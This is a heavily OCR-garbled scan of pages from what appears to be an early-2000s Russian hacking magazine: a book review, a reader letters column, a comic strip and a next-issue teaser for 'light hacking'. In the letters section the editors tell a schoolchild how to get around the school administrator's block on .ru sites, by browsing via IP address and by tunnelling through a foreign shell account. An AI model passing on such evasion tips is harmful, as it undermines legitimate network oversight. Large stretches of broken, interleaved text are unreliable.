шел :(, может, конечно, плохо искал... Короче го- 
воря, радости или хотя бы интереса при изучении 
данной буки я не ощутил... 
Рекомендуется: никому :(. 


В. Зима, А. Молдовян, Н. Молдовян. 
Безопасность глобальных сетевых технологий. 
- СПб.: БХВ-Петербург, 2000 - 320 с. 


еплохая кни- 
га по безо- 
пасности, и, 


как обычно случает- 
ся, авторы достаточ- 
но много рассказы- 
вают о нападении 
на хост или сеть. 
Радует также и то, 
что есть описание 
работы «огненной 
стены» (а также да- 
ются рекомендации 
по настройке и ис- 
пользованию) и со- 
веты авторов, как 
выбрать и протестировать на устойчивость к ата- 
кам файрволл. Поясняются принципы работы раз- 
ных сетевых служб, влияющих на безопасность. 
Причем все рассказывается и объясняется впол- 
не нормально и понятно даже для не очень про- 
двинутого админа, так что читается книга легко и 
не страдает особым прогрузом. Поэтому стоит 
почитать, если ты все-таки решил осознать, как 
защитить или, наоборот, взломать какую-либо си- 
стему безопасности. 

Рекомендуется: «для администраторов и пользо- 
вателей компьютерных систем...». 
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ер девушки и пиво :)). отдельное спасибо : 


ут Спец. Огромный тебе Респект 
< выразить не много благодарности 
вопрос 
Благодарность: ВЫ-молодцы 
кульныи журнал, OCOOCHHO (с 
< {TO И ТОЛЬКО Ha KOM 

i изни есть и другие при | 7 
yyOpuky: Пре... где вы жалуетесь 


Bb 
ne 
ли 
пи 
лую тему приходится пропус 
тривать. Ты себе представляец 
рый воцарится на месте нашей 
ров? Я вот не представляю :). 1 


Чуть не забыл, ответ на твой 
ницу нужен новый документ. 


спасибо что делаете 


Гак что пока 
(ну вот, опять зациклился, блин). 
вопрос дал ты сам — под каждую 
Но если ты будешь творить в специали- 


и задать 


|, HOA 
ваться 
щи (на- 
на малое 


бравшись из-под 
тов сообщаем: на 


горы твоих рес- 
омпах не зацик- 


ваемся, но и спецов по девушкам и 
ву делать не будем. 
ать через себя и всесторонне рассма- 
ь тот бордель с запахом хмеля, 


Видишь ли, каж- 


KOTO- 
после выхода этих HOME- 
— КОМПЫ, КОМПЫ И КОМПЫ 


редакции 


стра- 


зированном редакторе HTML, то не почувствуешь этого. Читай туто- 


риалы, рассказывай анекдоты, пиши софт, респекты. 


Сначала буду наезжать на ве 
Спеце - только ме‹ 


умник 

(aDm) просто ес 
пальцы. Не, люди, так не) 
мя очень польцастые Е 
то потом хакерюги просто перевидуться как вид. Походу кто-то начинает 3 
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писаки. Н ке кто читает 


Croperyversor ied pr 


ши! Алилуйа, бразерс! 


зи М 


ак пиши H 
еже AO 


кунувший нах все свои пальцы, но не став! 
ным. А сдавать начали не мы, а ламо! Раны 
некоторые экземпляры этого подвида даже хаксорам фору давали. 
А теперь что? Чуть журнал посложнее стал, сразу ламо все отвали- 
лось... Ну ничего, поднимутся еще они и воздастся нам за хаки на- 


ALLY писанину 


аживае 


ормально о 
конально 3 
сие издание 


Драствуй, Некроперверсор 
(блин, как ты это выговариваешь 
:))! Занаезд придется ответить — к 
тебе только что выехал aDM, вы- 
ий от этого менее опас- 
е ведь какое ламо было, 


iii tue в ede inl Ва datas a 


» 2 1 i 2 3 | 


Вагоны] Здавствуйте. 


Возможно, вы очень заня- 
ты и на меня у вас нет вре- 
мени, 

но постарайтесь помочь советом. Дело в TOM, что у нас в школе администра- 
тор сети запретил доступ ко 
всем сайтам в зоне ги. Вы не 
могли бы подсказать какой - 
нибуль способ обойти это ог- 
раничение? 


Конечно, мы все заняты настоль- 

ооо [pew pach ава ко безумно, что помочь советом у 

нас никак не получится. Но мы по- 

стараемся :). Поскольку раско- 

пать дебри мозгов твоего админа мы не в силах, приводим все воз- 

можные варианты: 

А) если админ — лох и фильтрует только УРЛы, можно обращаться к 

любимым сайтам прямо по айпишнику. Забивай в адресную строку 

http://194.87.11.112/ и наслаждайся! 

B) если админ не совсем лох, затаривайся шеллом в зоне ‚сот и ор- 

ганизуй тоннель через буржуйский сервер (подробнее читай в статье 

«Прикладное туннелирование»). 

В) самый радикальный способ — забить на рунет! Нет, серьезно, 

ведь большинство инфы все равно дублируется либо в буржундии на 
аглицком, либо В 
В/льной Укране на на- 

Уважаемый Спецц!! шем родном. 

У меня есть практичес- Вот и все. Прорвешь- 

И И ся через несчастного 

шим о админа — доложи, по- | 

$))Я покупал ваш ж радуемся вместе. | 

нал ‚потому что вы писали много хорошего и интерестного и каждыи журнал ie 

по своем хорош!В нем я и мои друзья узнавали много полезного и смешно- 

го+)(особенно статьи Дани и Niro)HO недавно пошла серия спецов про 

взлом, конечно они тоже инте- 


рестные, но я в них мало по- 
нимаю ‚потому что я не ха- 


Заранее спасибо. 


Kep=(... по этому я хотел Брателло, ну ты просто 
спросить вас ‘Kak долго вы Е Ис er na ь С 
м > а" про From: Lenin : = читаешь мысли всей ре- 


ВАМ 22? Очень хочетца дакции! Мы тоже ходим 
Bou тать что- Ни разно- под окнами Ноа с огром- 
(@оазное. НУ пока' ными транспарантами «Долой взлом!», «Даешь спец по настройке 
кухонных комбайнов!» и прочими подобными. Но вынужден тебято ли 
разочаровать, то ли обнадежить — следующий спец будет последним 
в серии «Взлом» и будет посвящен... легкому хаку :). Так что возмож- 
но, что прочитав его, ты наберешься знаниями, одолеешь всю про- 
шедшую серию и поломаешь Microsoft.com :). А пока - учись и го- 
товься к новой ударной серии спецов. Какой? Скоро узнаешь... :) 


Я просканировал один сервант 
‚ ион мнеб вылал что там чтоит 
какойто Lotus Notus/Domino!! 
Че это еше за домино??? 


Чувааак! Домино — это такая страте- 
гическая мультиплеерная реалтаймо- 


вая гамеса с элементами ВРС, похо- 

жая на упрощенный Magic The 
Gathering. Основное отличие ее внеболышом количестве заклинаний («ры- 
ба», «козлы», ETC.) и исполнении карточек — они более плотные и без кар- 
тинок :). Аесли серьезно, TO твой сервант скорее всего находится в корпо- 
ративной сети с интегрированной ИС. He ломай их, a TO хуже будет ‹). 


ПОНИМАЕШЬ, СЕНАТОР, 
ОЧЕНЬ ВНУТРЬ НАДО, 
А ИНСТИТУТСКИЕ ЗАЯВКИ 
НАКРЬМИСЬ. А TYT КАК 
РАЗ ЛОГИ НА РЫНКЕ 

ПОДОРОЖАЛИ... il 


ДА ПОШЕЛ ТЫ, 
ШАНТАЖИСТ ХРЕНОВ! 
Я БЫ И ТАК ПУСТИИ, у 
ДА ВНУТРЕННИМИ КАМЕРАМИ 
НЕ Я УПРАВЛЯЮ. ВАС ВСЕ 
“sy, РАВНО ЗАПАЛЯТ, А МЕНЯ 
РАБОТЫ ПОПРУТ, 


ВАЛИТЕ ОТСЮДА’ UT 


! УЛИЧНУЮ КАМЕРУ 
этим говном 9 УТОК ВЛЕВО 

И ДАЙ СВОЙ ПАД 

ПОДЕРЖАТЬ, = 


СДУРЕЛ! 


| ВЗЛОМАТЬ РЕШИЛ? 
ь HAC ПОСАДЯТ! р 


"НЕ ПОСАДЯТ, 
ЕСЛИ : 
ПЕРЕСТАНЕШЬ ЕСТЬ КОННЕКТ!“ 
ОРАТЬ. ЭТИ ЗАМКИ] ПРИВЕТ, НЕЙРОБРАТ! 
ФУФЛО, HE ДЛЯ | ыы НАМ НУЖНО ТУТ ОДИН 
‚ ДЛИТЕЛЬНОГО a | ЗАМОЧЕК... ЗА НАМИ 
Т ХРАНЕНИЯ a ; НЕ ЗАРЖАВЕЕТ! 


` ДВА LEAMA 4 
УРОВНЯ “AA” 
СУВЕНИРЫ С 
“НЕЙРОТЕКА”:) 


" Я ЭТО ИНАЧЕ 
СЕБЕ ПРЕДСТАВЛЯЛА! 


ЧУВСТВУЮ, НА ЭТОТ РАЗ 


МЫ НЕ ОТМАЖЕМСЯ, 

И РООБЩЕ, НАМ ЕЩЕ 

ПОВЕЗЛО, ЧТО ЗДЕСЬ 
КОНТЕЙНЕРЫ РЕЗ 
ОХРАНЫ БРОСИЛИ, 


НАС 


ВСЕ-ТАКИ 
ПОЛУЧИЛОСЫ 
РЕБЯТА, Я ВАС 
_ ОБОЖАЮ! в 


— У’ ТЕХНОЛОГИЙ, РЕЗУЛЬТАТ ^ 
wef ДЛИТЕЛЬНЫХ ИССЛЕДОВАНИЙ 
fe, КОМПАНИИ “НЕЙРОСОФТ” — 


НОВЕЙШАЯ РАЗРАБОТКА 
№ МЕНТАЛЬНАЯ РЕАЛЬНОСТЬ» 


СТОПРОЦЕНТНЫЙ 
ЭФФЕКТ ПРИСУТСТВИЯ, 
КАРДИНАЛЬНО НОВЫЙ 
ИНТЕРФЕЙС, 
ПОЗВОЛЯЮЩИЙ 
ЗАДЕЙСТВОВАТЬ 
ВСЕ ПЯТЬ ЧУВСТВ 
ЧЕЛОВЕКА. 
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Я ВИЖУ ЗДЕСЬ 
БУРЮ НЕГАТИВА. 

РЕБЯТА, ЛУЧШИЙ СПОСОБ 
ВЫЯСНИТЬ ОТНОШЕНИЯ — 
УСТРОИТЬ СПОРТИВНЫЙ ПОЕДИНОК, 
\ НО НЕ ПРОСТОЙ, А ВИРТУАЛЬНЫЙ! 
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СЕЙЧАС ЭТИ ЮНОШИ 
ПОЛНОСТЬЮ ПОГРУЗЯТСЯ 
В ВИРТУАЛЬНЫЙ МИР И ОКАЖУТСЯ 
НА ЦЕНТРАЛЬНОМ ГРАВИГОНЕ 
ГОРОДА, ГДЕ СМОГУТ НАСАЖАТЬ 
ДРУГ ДРУГУ ДИСКОВ, ЛИБО 


о РАЗМОЗЖИТЬ ГОЛОВЫ. 
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С КАКОЙ РАДОСТИ У НЕГО 
КЛЮШКА С ЛЕЗВИЕМ, 
А У МЕНЯ НЕТ, 

НУ, ПОФИГ. ПОЕХАЛИ! 


ye 


ЭТО АБСОЛЮТНО 
БЕЗОПАСНО. 
ГАРАНТИЯ 
“НЕЙРОСОФТ”! 


B CAEDYIOUWIEM 
НОМЕРЕ 


Самый деструктивный номер! Все способы быстрого хака от Spez-Crew. 3E8 и 1 
рецепт по взлому всего, что шевелится! 

Мы несколько месяцев грузились, напрягали лбы, впитывали и переваривали 
инфу по хаку. Разобрали кучу типов атак, кучу протоколов и черт знает что еще. 
Хватит! Пришло время отрываться!!! Легкий ВЗЛОМ уже идет!!! 
Последний номер из серии Спецов по взлому :(. Не пропусти!!! 
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Приглашаем к сотрудничеству 


Серьезная мощь 
для серьезных игр 


computers 


| 
| 


beta ringer betel идее. Рура о Бетонный Tabbed ick eked COE wad detrei a CLL м cor Chea 


ЕЖЕМЕСЯЧНЫЙ, ТЕМАТИЧЕСКИЙ, КОМПЬЮТЕРНЫЙ ЖУРНАЛ 


